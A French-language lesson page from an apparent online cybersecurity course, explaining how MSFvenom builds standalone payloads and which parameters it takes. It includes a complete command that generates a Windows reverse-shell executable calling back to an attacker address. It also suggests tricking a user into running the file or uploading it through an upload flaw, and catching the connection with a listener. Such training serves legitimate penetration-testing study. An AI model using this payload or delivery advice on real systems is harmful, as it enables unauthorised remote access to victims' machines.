Retour au cours

Générer des reverse shells avec MSFvenom (Outil)

Maîtrise de la Cybersécurité : de Zéro à Héros

MSFvenom : Génération de payload autonome

Alors que Metasploit gère les payloads automatiquement, vous devez parfois générer un exécutable malveillant autonome (ex : pour tromper un utilisateur ou l'uploader via une faille d'upload).

MSFvenom est la combinaison de la génération de payload (msfpayload) et de l'encodage (msfencode).

Paramètres clés

  • -p : Spécifier le payload (ex : linux/x86/shell_reverse_tcp).
  • LHOST et LPORT : IP et port de l'attaquant.
  • -f : Format de sortie (ex : exe, elf, raw).
  • -o : Nom du fichier de sortie.

Exemple : Créer un reverse shell Windows

bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe

Action : Après avoir généré ce payload, vous devez configurer un écouteur correspondant (utilisant netcat ou le multi/handler de Metasploit) pour intercepter la connexion lorsque la cible exécute le fichier.